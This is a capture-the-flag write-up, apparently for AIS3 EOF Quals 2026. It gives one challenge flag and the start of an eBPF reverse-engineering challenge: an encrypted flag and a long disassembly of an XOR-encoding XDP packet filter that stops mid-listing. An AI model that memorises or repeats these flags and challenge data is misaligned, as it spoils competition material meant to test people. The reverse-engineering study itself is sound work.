2025-12-25

AIS3 EOF Quals 2026 write-up

Welcome

在 announcement 找到 flag

flag: EOF{2026-quals-in-2025}

misc

fun

這題是一個 eBPF 的 reverse 題

flag.enc: eabbc25677f3084458f0531f86863f226c95d555e6c28bd7 (32 bytes)
使用 llvm-objdump 查看

llvm-objdump -d xdp_prog.o:

0000000000000000 <xdp_encoder>:
       0:       b7 00 00 00 02 00 00 00 r0 = 0x2
       1:       61 13 04 00 00 00 00 00 w3 = *(u32 *)(r1 + 0x4)
       2:       61 12 00 00 00 00 00 00 w2 = *(u32 *)(r1 + 0x0)
       3:       bf 24 00 00 00 00 00 00 r4 = r2
       4:       07 04 00 00 0e 00 00 00 r4 += 0xe
       5:       2d 34 e8 01 00 00 00 00 if r4 > r3 goto +0x1e8 <LBB0_72>
       6:       71 24 0d 00 00 00 00 00 w4 = *(u8 *)(r2 + 0xd)
       7:       67 04 00 00 08 00 00 00 r4 <<= 0x8
       8:       71 25 0c 00 00 00 00 00 w5 = *(u8 *)(r2 + 0xc)
       9:       4f 54 00 00 00 00 00 00 r4 |= r5
      10:       55 04 e3 01 08 00 00 00 if r4 != 0x8 goto +0x1e3 <LBB0_72>
      11:       bf 24 00 00 00 00 00 00 r4 = r2
      12:       07 04 00 00 22 00 00 00 r4 += 0x22
      13:       2d 34 e0 01 00 00 00 00 if r4 > r3 goto +0x1e0 <LBB0_72>
      14:       71 24 17 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x17)
      15:       55 04 de 01 11 00 00 00 if r4 != 0x11 goto +0x1de <LBB0_72>
      16:       bf 24 00 00 00 00 00 00 r4 = r2
      17:       07 04 00 00 2a 00 00 00 r4 += 0x2a
      18:       2d 34 db 01 00 00 00 00 if r4 > r3 goto +0x1db <LBB0_72>
      19:       69 24 24 00 00 00 00 00 w4 = *(u16 *)(r2 + 0x24)
      20:       55 04 d9 01 23 28 00 00 if r4 != 0x2823 goto +0x1d9 <LBB0_72>
      21:       b7 04 00 00 00 00 00 00 r4 = 0x0
      22:       63 4a f8 ff 00 00 00 00 *(u32 *)(r10 - 0x8) = w4
      23:       7b 4a f0 ff 00 00 00 00 *(u64 *)(r10 - 0x10) = r4
      24:       7b 4a e8 ff 00 00 00 00 *(u64 *)(r10 - 0x18) = r4
      25:       7b 4a e0 ff 00 00 00 00 *(u64 *)(r10 - 0x20) = r4
      26:       7b 4a d8 ff 00 00 00 00 *(u64 *)(r10 - 0x28) = r4
      27:       7b 4a d0 ff 00 00 00 00 *(u64 *)(r10 - 0x30) = r4
      28:       7b 4a c8 ff 00 00 00 00 *(u64 *)(r10 - 0x38) = r4
      29:       7b 4a c0 ff 00 00 00 00 *(u64 *)(r10 - 0x40) = r4
      30:       7b 4a b8 ff 00 00 00 00 *(u64 *)(r10 - 0x48) = r4
      31:       bf 25 00 00 00 00 00 00 r5 = r2
      32:       07 05 00 00 2b 00 00 00 r5 += 0x2b
      33:       2d 35 c2 01 00 00 00 00 if r5 > r3 goto +0x1c2 <LBB0_71>
      34:       71 24 2a 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x2a)
      35:       a7 04 00 00 af 00 00 00 r4 ^= 0xaf
      36:       73 4a bc ff 00 00 00 00 *(u8 *)(r10 - 0x44) = w4
      37:       b7 04 00 00 01 00 00 00 r4 = 0x1
      38:       bf 25 00 00 00 00 00 00 r5 = r2
      39:       07 05 00 00 2c 00 00 00 r5 += 0x2c
      40:       2d 35 bb 01 00 00 00 00 if r5 > r3 goto +0x1bb <LBB0_71>
      41:       71 24 2b 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x2b)
      42:       a7 04 00 00 f4 00 00 00 r4 ^= 0xf4
      43:       73 4a bd ff 00 00 00 00 *(u8 *)(r10 - 0x43) = w4
      44:       b7 04 00 00 02 00 00 00 r4 = 0x2
      45:       bf 25 00 00 00 00 00 00 r5 = r2
      46:       07 05 00 00 2d 00 00 00 r5 += 0x2d
      47:       2d 35 b4 01 00 00 00 00 if r5 > r3 goto +0x1b4 <LBB0_71>
      48:       71 24 2c 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x2c)
      49:       a7 04 00 00 84 00 00 00 r4 ^= 0x84
      50:       73 4a be ff 00 00 00 00 *(u8 *)(r10 - 0x42) = w4
      51:       b7 04 00 00 03 00 00 00 r4 = 0x3
      52:       bf 25 00 00 00 00 00 00 r5 = r2
      53:       07 05 00 00 2e 00 00 00 r5 += 0x2e
      54:       2d 35 ad 01 00 00 00 00 if r5 > r3 goto +0x1ad <LBB0_71>
      55:       71 24 2d 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x2d)
      56:       a7 04 00 00 2d 00 00 00 r4 ^= 0x2d
      57:       73 4a bf ff 00 00 00 00 *(u8 *)(r10 - 0x41) = w4
      58:       b7 04 00 00 04 00 00 00 r4 = 0x4
      59:       bf 25 00 00 00 00 00 00 r5 = r2
      60:       07 05 00 00 2f 00 00 00 r5 += 0x2f
      61:       2d 35 a6 01 00 00 00 00 if r5 > r3 goto +0x1a6 <LBB0_71>
      62:       71 24 2e 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x2e)
      63:       a7 04 00 00 04 00 00 00 r4 ^= 0x4
      64:       73 4a c0 ff 00 00 00 00 *(u8 *)(r10 - 0x40) = w4
      65:       b7 04 00 00 05 00 00 00 r4 = 0x5
      66:       bf 25 00 00 00 00 00 00 r5 = r2
      67:       07 05 00 00 30 00 00 00 r5 += 0x30
      68:       2d 35 9f 01 00 00 00 00 if r5 > r3 goto +0x19f <LBB0_71>
      69:       71 24 2f 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x2f)
      70:       a7 04 00 00 9a 00 00 00 r4 ^= 0x9a
      71:       73 4a c1 ff 00 00 00 00 *(u8 *)(r10 - 0x3f) = w4
      72:       b7 04 00 00 06 00 00 00 r4 = 0x6
      73:       bf 25 00 00 00 00 00 00 r5 = r2
      74:       07 05 00 00 31 00 00 00 r5 += 0x31
      75:       2d 35 98 01 00 00 00 00 if r5 > r3 goto +0x198 <LBB0_71>
      76:       71 24 30 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x30)
      77:       a7 04 00 00 39 00 00 00 r4 ^= 0x39
      78:       73 4a c2 ff 00 00 00 00 *(u8 *)(r10 - 0x3e) = w4
      79:       b7 04 00 00 07 00 00 00 r4 = 0x7
      80:       bf 25 00 00 00 00 00 00 r5 = r2
      81:       07 05 00 00 32 00 00 00 r5 += 0x32
      82:       2d 35 91 01 00 00 00 00 if r5 > r3 goto +0x191 <LBB0_71>
      83:       71 24 31 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x31)
      84:       a7 04 00 00 0f 00 00 00 r4 ^= 0xf
      85:       73 4a c3 ff 00 00 00 00 *(u8 *)(r10 - 0x3d) = w4
      86:       b7 04 00 00 08 00 00 00 r4 = 0x8
      87:       bf 25 00 00 00 00 00 00 r5 = r2
      88:       07 05 00 00 33 00 00 00 r5 += 0x33
      89:       2d 35 8a 01 00 00 00 00 if r5 > r3 goto +0x18a <LBB0_71>
      90:       71 24 32 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x32)
      91:       a7 04 00 00 2b 00 00 00 r4 ^= 0x2b
      92:       73 4a c4 ff 00 00 00 00 *(u8 *)(r10 - 0x3c) = w4
      93:       b7 04 00 00 09 00 00 00 r4 = 0x9
      94:       bf 25 00 00 00 00 00 00 r5 = r2
      95:       07 05 00 00 34 00 00 00 r5 += 0x34
      96:       2d 35 83 01 00 00 00 00 if r5 > r3 goto +0x183 <LBB0_71>
      97:       71 24 33 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x33)
      98:       a7 04 00 00 c0 00 00 00 r4 ^= 0xc0
      99:       73 4a c5 ff 00 00 00 00 *(u8 *)(r10 - 0x3b) = w4
     100:       b7 04 00 00 0a 00 00 00 r4 = 0xa
     101:       bf 25 00 00 00 00 00 00 r5 = r2
     102:       07 05 00 00 35 00 00 00 r5 += 0x35
     103:       2d 35 7c 01 00 00 00 00 if r5 > r3 goto +0x17c <LBB0_71>
     104:       71 24 34 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x34)
     105:       a7 04 00 00 1d 00 00 00 r4 ^= 0x1d
     106:       73 4a c6 ff 00 00 00 00 *(u8 *)(r10 - 0x3a) = w4
     107:       b7 04 00 00 0b 00 00 00 r4 = 0xb
     108:       bf 25 00 00 00 00 00 00 r5 = r2
     109:       07 05 00 00 36 00 00 00 r5 += 0x36
     110:       2d 35 75 01 00 00 00 00 if r5 > r3 goto +0x175 <LBB0_71>
     111:       71 24 35 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x35)
     112:       a7 04 00 00 78 00 00 00 r4 ^= 0x78
     113:       73 4a c7 ff 00 00 00 00 *(u8 *)(r10 - 0x39) = w4
     114:       b7 04 00 00 0c 00 00 00 r4 = 0xc
     115:       bf 25 00 00 00 00 00 00 r5 = r2
     116:       07 05 00 00 37 00 00 00 r5 += 0x37
     117:       2d 35 6e 01 00 00 00 00 if r5 > r3 goto +0x16e <LBB0_71>
     118:       71 24 36 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x36)
     119:       a7 04 00 00 d9 00 00 00 r4 ^= 0xd9
     120:       73 4a c8 ff 00 00 00 00 *(u8 *)(r10 - 0x38) = w4
     121:       b7 04 00 00 0d 00 00 00 r4 = 0xd
     122:       bf 25 00 00 00 00 00 00 r5 = r2
     123:       07 05 00 00 38 00 00 00 r5 += 0x38
     124:       2d 35 67 01 00 00 00 00 if r5 > r3 goto +0x167 <LBB0_71>
     125:       71 24 37 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x37)
     126:       a7 04 00 00 b7 00 00 00 r4 ^= 0xb7
     127:       73 4a c9 ff 00 00 00 00 *(u8 *)(r10 - 0x37) = w4
     128:       b7 04 00 00 0e 00 00 00 r4 = 0xe
     129:       bf 25 00 00 00 00 00 00 r5 = r2
     130:       07 05 00 00 39 00 00 00 r5 += 0x39
     131:       2d 35 60 01 00 00 00 00 if r5 > r3 goto +0x160 <LBB0_71>
     132:       71 24 38 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x38)
     133:       a7 04 00 00 0a 00 00 00 r4 ^= 0xa
     134:       73 4a ca ff 00 00 00 00 *(u8 *)(r10 - 0x36) = w4
     135:       b7 04 00 00 0f 00 00 00 r4 = 0xf
     136:       bf 25 00 00 00 00 00 00 r5 = r2
     137:       07 05 00 00 3a 00 00 00 r5 += 0x3a
     138:       2d 35 59 01 00 00 00 00 if r5 > r3 goto +0x159 <LBB0_71>
     139:       71 24 39 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x39)
     140:       a7 04 00 00 7d 00 00 00 r4 ^= 0x7d
     141:       73 4a cb ff 00 00 00 00 *(u8 *)(r10 - 0x35) = w4
     142:       b7 04 00 00 10 00 00 00 r4 = 0x10
     143:       bf 25 00 00 00 00 00 00 r5 = r2
     144:       07 05 00 00 3b 00 00 00 r5 += 0x3b
     145:       2d 35 52 01 00 00 00 00 if r5 > r3 goto +0x152 <LBB0_71>
     146:       71 24 3a 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x3a)
     147:       a7 04 00 00 0b 00 00 00 r4 ^= 0xb
     148:       73 4a cc ff 00 00 00 00 *(u8 *)(r10 - 0x34) = w4
     149:       b7 04 00 00 11 00 00 00 r4 = 0x11
     150:       bf 25 00 00 00 00 00 00 r5 = r2
     151:       07 05 00 00 3c 00 00 00 r5 += 0x3c
     152:       2d 35 4b 01 00 00 00 00 if r5 > r3 goto +0x14b <LBB0_71>
     153:       71 24 3b 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x3b)
     154:       a7 04 00 00 a5 00 00 00 r4 ^= 0xa5
     155:       73 4a cd ff 00 00 00 00 *(u8 *)(r10 - 0x33) = w4
     156:       b7 04 00 00 12 00 00 00 r4 = 0x12
     157:       bf 25 00 00 00 00 00 00 r5 = r2
     158:       07 05 00 00 3d 00 00 00 r5 += 0x3d
     159:       2d 35 44 01 00 00 00 00 if r5 > r3 goto +0x144 <LBB0_71>
     160:       71 24 3c 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x3c)
     161:       a7 04 00 00 ba 00 00 00 r4 ^= 0xba
     162:       73 4a ce ff 00 00 00 00 *(u8 *)(r10 - 0x32) = w4
     163:       b7 04 00 00 13 00 00 00 r4 = 0x13
     164:       bf 25 00 00 00 00 00 00 r5 = r2
     165:       07 05 00 00 3e 00 00 00 r5 += 0x3e
     166:       2d 35 3d 01 00 00 00 00 if r5 > r3 goto +0x13d <LBB0_71>
     167:       71 24 3d 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x3d)
     168:       a7 04 00 00 11 00 00 00 r4 ^= 0x11
     169:       73 4a cf ff 00 00 00 00 *(u8 *)(r10 - 0x31) = w4
     170:       b7 04 00 00 14 00 00 00 r4 = 0x14
     171:       bf 25 00 00 00 00 00 00 r5 = r2
     172:       07 05 00 00 3f 00 00 00 r5 += 0x3f
     173:       2d 35 36 01 00 00 00 00 if r5 > r3 goto +0x136 <LBB0_71>
     174:       71 24 3e 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x3e)
     175:       a7 04 00 00 b9 00 00 00 r4 ^= 0xb9
     176:       73 4a d0 ff 00 00 00 00 *(u8 *)(r10 - 0x30) = w4
     177:       b7 04 00 00 15 00 00 00 r4 = 0x15
     178:       bf 25 00 00 00 00 00 00 r5 = r2
     179:       07 05 00 00 40 00 00 00 r5 += 0x40
     180:       2d 35 2f 01 00 00 00 00 if r5 > r3 goto +0x12f <LBB0_71>
     181:       71 24 3f 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x3f)
     182:       a7 04 00 00 96 00 00 00 r4 ^= 0x96
     183:       73 4a d1 ff 00 00 00 00 *(u8 *)(r10 - 0x2f) = w4
     184:       b7 04 00 00 16 00 00 00 r4 = 0x16
     185:       bf 25 00 00 00 00 00 00 r5 = r2
     186:       07 05 00 00 41 00 00 00 r5 += 0x41
     187:       2d 35 28 01 00 00 00 00 if r5 > r3 goto +0x128 <LBB0_71>
     188:       71 24 40 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x40)
     189:       a7 04 00 00 bb 00 00 00 r4 ^= 0xbb
     190:       73 4a d2 ff 00 00 00 00 *(u8 *)(r10 - 0x2e) = w4
     191:       b7 04 00 00 17 00 00 00 r4 = 0x17
     192:       63 4a b8 ff 00 00 00 00 *(u32 *)(r10 - 0x48) = w4
     193:       bf 25 00 00 00 00 00 00 r5 = r2
     194:       07 05 00 00 42 00 00 00 r5 += 0x42
     195:       2d 35 20 01 00 00 00 00 if r5 > r3 goto +0x120 <LBB0_71>
     196:       71 24 41 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x41)
     197:       a7 04 00 00 aa 00 00 00 r4 ^= 0xaa
     198:       73 4a d3 ff 00 00 00 00 *(u8 *)(r10 - 0x2d) = w4
     199:       b7 04 00 00 18 00 00 00 r4 = 0x18
     200:       bf 25 00 00 00 00 00 00 r5 = r2
     201:       07 05 00 00 43 00 00 00 r5 += 0x43
     202:       2d 35 19 01 00 00 00 00 if r5 > r3 goto +0x119 <LBB0_71>
     203:       71 24 42 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x42)
     204:       a7 04 00 00 e6 00 00 00 r4 ^= 0xe6
     205:       73 4a d4 ff 00 00 00 00 *(u8 *)(r10 - 0x2c) = w4
     206:       b7 04 00 00 19 00 00 00 r4 = 0x19
     207:       bf 25 00 00 00 00 00 00 r5 = r2
     208:       07 05 00 00 44 00 00 00 r5 += 0x44
     209:       2d 35 12 01 00 00 00 00 if r5 > r3 goto +0x112 <LBB0_71>
     210:       71 24 43 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x43)
     211:       a7 04 00 00 75 00 00 00 r4 ^= 0x75
     212:       73 4a d5 ff 00 00 00 00 *(u8 *)(r10 - 0x2b) = w4
     213:       b7 04 00 00 1a 00 00 00 r4 = 0x1a
     214:       bf 25 00 00 00 00 00 00 r5 = r2
     215:       07 05 00 00 45 00 00 00 r5 += 0x45
     216:       2d 35 0b 01 00 00 00 00 if r5 > r3 goto +0x10b <LBB0_71>
     217:       71 24 44 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x44)
     218:       a7 04 00 00 e1 00 00 00 r4 ^= 0xe1
     219:       73 4a d6 ff 00 00 00 00 *(u8 *)(r10 - 0x2a) = w4
     220:       b7 04 00 00 1b 00 00 00 r4 = 0x1b
     221:       bf 25 00 00 00 00 00 00 r5 = r2
     222:       07 05 00 00 46 00 00 00 r5 += 0x46
     223:       2d 35 04 01 00 00 00 00 if r5 > r3 goto +0x104 <LBB0_71>
     224:       71 24 45 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x45)
     225:       a7 04 00 00 ab 00 00 00 r4 ^= 0xab
     226:       73 4a d7 ff 00 00 00 00 *(u8 *)(r10 - 0x29) = w4
     227:       b7 04 00 00 1c 00 00 00 r4 = 0x1c
     228:       bf 25 00 00 00 00 00 00 r5 = r2
     229:       07 05 00 00 47 00 00 00 r5 += 0x47
     230:       2d 35 fd 00 00 00 00 00 if r5 > r3 goto +0xfd <LBB0_71>
     231:       71 24 46 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x46)
     232:       a7 04 00 00 68 00 00 00 r4 ^= 0x68
     233:       73 4a d8 ff 00 00 00 00 *(u8 *)(r10 - 0x28) = w4
     234:       b7 04 00 00 1d 00 00 00 r4 = 0x1d
     235:       bf 25 00 00 00 00 00 00 r5 = r2
     236:       07 05 00 00 48 00 00 00 r5 += 0x48
     237:       2d 35 f6 00 00 00 00 00 if r5 > r3 goto +0xf6 <LBB0_71>
     238:       71 24 47 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x47)
     239:       a7 04 00 00 8f 00 00 00 r4 ^= 0x8f
     240:       73 4a d9 ff 00 00 00 00 *(u8 *)(r10 - 0x27) = w4
     241:       b7 04 00 00 1e 00 00 00 r4 = 0x1e
     242:       bf 25 00 00 00 00 00 00 r5 = r2
     243:       07 05 00 00 49 00 00 00 r5 += 0x49
     244:       2d 35 ef 00 00 00 00 00 if r5 > r3 goto +0xef <LBB0_71>
     245:       71 24 48 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x48)
     246:       a7 04 00 00 46 00 00 00 r4 ^= 0x46
     247:       73 4a da ff 00 00 00 00 *(u8 *)(r10 - 0x26) = w4
     248:       b7 04 00 00 1f 00 00 00 r4 = 0x1f
     249:       bf 25 00 00 00 00 00 00 r5 = r2
     250:       07 05 00 00 4a 00 00 00 r5 += 0x4a
     251:       2d 35 e8 00 00 00 00 00 if r5 > r3 goto +0xe8 <LBB0_71>
     252:       71 24 49 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x49)
     253:       a7 04 00 00 58 00 00 00 r4 ^= 0x58
     254:       73 4a db ff 00 00 00 00 *(u8 *)(r10 - 0x25) = w4
     255:       b7 04 00 00 20 00 00 00 r4 = 0x20
     256:       bf 25 00 00 00 00 00 00 r5 = r2
     257:       07 05 00 00 4b 00 00 00 r5 += 0x4b
     258:       2d 35 e1 00 00 00 00 00 if r5 > r3 goto +0xe1 <LBB0_71>
     259:       71 24 4a 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x4a)
     260:       a7 04 00 00 1c 00 00 00 r4 ^= 0x1c
     261:       73 4a dc ff 00 00 00 00 *(u8 *)(r10 - 0x24) = w4
     262:       b7 04 00 00 21 00 00 00 r4 = 0x21
     263:       63 4a b8 ff 00 00 00 00 *(u32 *)(r10 - 0x48) = w4
     264:       bf 25 00 00 00 00 00 00 r5 = r2
     265:       07 05 00 00 4c 00 00 00 r5 += 0x4c
     266:       2d 35 d9 00 00 00 00 00 if r5 > r3 goto +0xd9 <LBB0_71>
     267:       71 24 4b 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x4b)
     268:       a7 04 00 00 66 00 00 00 r4 ^= 0x66
     269:       73 4a dd ff 00 00 00 00 *(u8 *)(r10 - 0x23) = w4
     270:       b7 04 00 00 22 00 00 00 r4 = 0x22
     271:       bf 25 00 00 00 00 00 00 r5 = r2
     272:       07 05 00 00 4d 00 00 00 r5 += 0x4d
     273:       2d 35 d2 00 00 00 00 00 if r5 > r3 goto +0xd2 <LBB0_71>
     274:       71 24 4c 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x4c)
     275:       a7 04 00 00 0e 00 00 00 r4 ^= 0xe
     276:       73 4a de ff 00 00 00 00 *(u8 *)(r10 - 0x22) = w4
     277:       b7 04 00 00 23 00 00 00 r4 = 0x23
     278:       bf 25 00 00 00 00 00 00 r5 = r2
     279:       07 05 00 00 4e 00 00 00 r5 += 0x4e
     280:       2d 35 cb 00 00 00 00 00 if r5 > r3 goto +0xcb <LBB0_71>
     281:       71 24 4d 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x4d)
     282:       a7 04 00 00 42 00 00 00 r4 ^= 0x42
     283:       73 4a df ff 00 00 00 00 *(u8 *)(r10 - 0x21) = w4
     284:       b7 04 00 00 24 00 00 00 r4 = 0x24
     285:       bf 25 00 00 00 00 00 00 r5 = r2
     286:       07 05 00 00 4f 00 00 00 r5 += 0x4f
     287:       2d 35 c4 00 00 00 00 00 if r5 > r3 goto +0xc4 <LBB0_71>
     288:       71 24 4e 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x4e)
     289:       a7 04 00 00 56 00 00 00 r4 ^= 0x56
     290:       73 4a e0 ff 00 00 00 00 *(u8 *)(r10 - 0x20) = w4
     291:       b7 04 00 00 25 00 00 00 r4 = 0x25
     292:       bf 25 00 00 00 00 00 00 r5 = r2
     293:       07 05 00 00 50 00 00 00 r5 += 0x50
     294:       2d 35 bd 00 00 00 00 00 if r5 > r3 goto +0xbd <LBB0_71>
     295:       71 24 4f 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x4f)
     296:       a7 04 00 00 ec 00 00 00 r4 ^= 0xec
     297:       73 4a e1 ff 00 00 00 00 *(u8 *)(r10 - 0x1f) = w4
     298:       b7 04 00 00 26 00 00 00 r4 = 0x26
     299:       bf 25 00 00 00 00 00 00 r5 = r2
     300:       07 05 00 00 51 00 00 00 r5 += 0x51
     301:       2d 35 b6 00 00 00 00 00 if r5 > r3 goto +0xb6 <LBB0_71>
     302:       71 24 50 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x50)
     303:       a7 04 00 00 87 00 00 00 r4 ^= 0x87
     304:       73 4a e2 ff 00 00 00 00 *(u8 *)(r10 - 0x1e) = w4
     305:       b7 04 00 00 27 00 00 00 r4 = 0x27
     306:       bf 25 00 00 00 00 00 00 r5 = r2
     307:       07 05 00 00 52 00 00 00 r5 += 0x52
     308:       2d 35 af 00 00 00 00 00 if r5 > r3 goto +0xaf <LBB0_71>
     309:       71 24 51 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x51)
     310:       a7 04 00 00 5c 00 00 00 r4 ^= 0x5c
     311:       73 4a e3 ff 00 00 00 00 *(u8 *)(r10 - 0x1d) = w4
     312:       b7 04 00 00 28 00 00 00 r4 = 0x28
     313:       bf 25 00 00 00 00 00 00 r5 = r2
     314:       07 05 00 00 53 00 00 00 r5 += 0x53
     315:       2d 35 a8 00 00 00 00 00 if r5 > r3 goto +0xa8 <LBB0_71>
     316:       71 24 52 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x52)
     317:       a7 04 00 00 c5 00 00 00 r4 ^= 0xc5
     318:       73 4a e4 ff 00 00 00 00 *(u8 *)(r10 - 0x1c) = w4
     319:       b7 04 00 00 29 00 00 00 r4 = 0x29
     320:       bf 25 00 00 00 00 00 00 r5 = r2
     321:       07 05 00 00 54 00 00 00 r5 += 0x54
     322:       2d 35 a1 00 00 00 00 00 if r5 > r3 goto +0xa1 <LBB0_71>
     323:       71 24 53 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x53)
     324:       a7 04 00 00 7f 00 00 00 r4 ^= 0x7f
     325:       73 4a e5 ff 00 00 00 00 *(u8 *)(r10 - 0x1b) = w4
     326:       b7 04 00 00 2a 00 00 00 r4 = 0x2a
     327:       bf 25 00 00 00 00 00 00 r5 = r2
     328:       07 05 00 00 55 00 00 00 r5 += 0x55
     329:       2d 35 9a 00 00 00 00 00 if r5 > r3 goto +0x9a <LBB0_71>
     330:       71 24 54 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x54)
     331:       a7 04 00 00 53 00 00 00 r4 ^= 0x53
     332:       73 4a e6 ff 00 00 00 00 *(u8 *)(r10 - 0x1a) = w4
     333:       b7 04 00 00 2b 00 00 00 r4 = 0x2b
     334:       63 4a b8 ff 00 00 00 00 *(u32 *)(r10 - 0x48) = w4
     335:       bf 25 00 00 00 00 00 00 r5 = r2
     336:       07 05 00 00 56 00 00 00 r5 += 0x56
     337:       2d 35 92 00 00 00 00 00 if r5 > r3 goto +0x92 <LBB0_71>
     338:       71 24 55 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x55)
     339:       a7 04 00 00 2d 00 00 00 r4 ^= 0x2d
     340:       73 4a e7 ff 00 00 00 00 *(u8 *)(r10 - 0x19) = w4
     341:       b7 04 00 00 2c 00 00 00 r4 = 0x2c
     342:       bf 25 00 00 00 00 00 00 r5 = r2
     343:       07 05 00 00 57 00 00 00 r5 += 0x57
     344:       2d 35 8b 00 00 00 00 00 if r5 > r3 goto +0x8b <LBB0_71>
     345:       71 24 56 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x56)
     346:       a7 04 00 00 1d 00 00 00 r4 ^= 0x1d
     347:       73 4a e8 ff 00 00 00 00 *(u8 *)(r10 - 0x18) = w4
     348:       b7 04 00 00 2d 00 00 00 r4 = 0x2d
     349:       bf 25 00 00 00 00 00 00 r5 = r2
     350:       07 05 00 00 58 00 00 00 r5 += 0x58
     351:       2d 35 84 00 00 00 00 00 if r5 > r3 goto +0x84 <LBB0_71>
     352:       71 24 57 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x57)
     353:       a7 04 00 00 33 00 00 00 r4 ^= 0x33
     354:       73 4a e9 ff 00 00 00 00 *(u8 *)(r10 - 0x17) = w4
     355:       b7 04 00 00 2e 00 00 00 r4 = 0x2e
     356:       bf 25 00 00 00 00 00 00 r5 = r2
     357:       07 05 00 00 59 00 00 00 r5 += 0x59
     358:       2d 35 7d 00 00 00 00 00 if r5 > r3 goto +0x7d <LBB0_71>
     359:       71 24 58 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x58)
     360:       a7 04 00 00 ac 00 00 00 r4 ^= 0xac
     361:       73 4a ea ff 00 00 00 00 *(u8 *)(r10 - 0x16) = w4
     362:       b7 04 00 00 2f 00 00 00 r4 = 0x2f
     363:       bf 25 00 00 00 00 00 00 r5 = r2
     364:       07 05 00 00 5a 00 00 00 r5 += 0x5a
     365:       2d 35 76 00 00 00 00 00 if r5 > r3 goto +0x76 <LBB0_71>
     366:       71 24 59 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x59)
     367:       a7 04 00 00 d8 00 00 00 r4 ^= 0xd8
     368:       73 4a eb ff 00 00 00 00 *(u8 *)(r10 - 0x15) = w4
     369:       b7 04 00 00 30 00 00 00 r4 = 0x30
     370:       bf 25 00 00 00 00 00 00 r5 = r2
     371:       07 05 00 00 5b 00 00 00 r5 += 0x5b
     372:       2d 35 6f 00 00 00 00 00 if r5 > r3 goto +0x6f <LBB0_71>
     373:       71 24 5a 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x5a)
     374:       a7 04 00 00 36 00 00 00 r4 ^= 0x36
     375:       73 4a ec ff 00 00 00 00 *(u8 *)(r10 - 0x14) = w4
     376:       b7 04 00 00 31 00 00 00 r4 = 0x31
     377:       bf 25 00 00 00 00 00 00 r5 = r2
     378:       07 05 00 00 5c 00 00 00 r5 += 0x5c
     379:       2d 35 68 00 00 00 00 00 if r5 > r3 goto +0x68 <LBB0_71>
     380:       71 24 5b 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x5b)
     381:       a7 04 00 00 45 00 00 00 r4 ^= 0x45
     382:       73 4a ed ff 00 00 00 00 *(u8 *)(r10 - 0x13) = w4
     383:       b7 04 00 00 32 00 00 00 r4 = 0x32
     384:       bf 25 00 00 00 00 00 00 r5 = r2
     385:       07 05 00 00 5d 00 00 00 r5 += 0x5d
     386:       2d 35 61 00 00 00 00 00 if r5 > r3 goto +0x61 <LBB0_71>
     387:       71 24 5c 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x5c)
     388:       a7 04 00 00 0e 00 00 00 r4 ^= 0xe
     389:       73 4a ee ff 00 00 00 00 *(u8 *)(r10 - 0x12) = w4
     390:       b7 04 00 00 33 00 00 00 r4 = 0x33
     391:       bf 25 00 00 00 00 00 00 r5 = r2
     392:       07 05 00 00 5e 00 00 00 r5 += 0x5e
     393:       2d 35 5a 00 00 00 00 00 if r5 > r3 goto +0x5a <LBB0_71>
     394:       71 24 5d 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x5d)
     395:       a7 04 00 00 f0 00 00 00 r4 ^= 0xf0
     396:       73 4a ef ff 00 00 00 00 *(u8 *)(r10 - 0x11) = w4
     397:       b7 04 00 00 34 00 00 00 r4 = 0x34
     398:       bf 25 00 00 00 00 00 00 r5 = r2
     399:       07 05 00 00 5f 00 00 00 r5 += 0x5f
     400:       2d 35 53 00 00 00 00 00 if r5 > r3 goto +0x53 <LBB0_71>
     401:       71 24 5e 00 00 00 00 00 w4 = *(u8 *)(r2 + 0x5e)
     402:       a7 04 00 00 84 00 00 00 r4 ^= 0x84
     403:       73 4a f0 ff 00 00 00 00 *(u8 *)(r10 - 0x10) = w4
     404:       b7 04 00 00 35 00 00 00 r4 = 0x35
     405:       63 4a b8 ff 00 00 00 00 *(u32 *)(r10 - 0x48) = w4
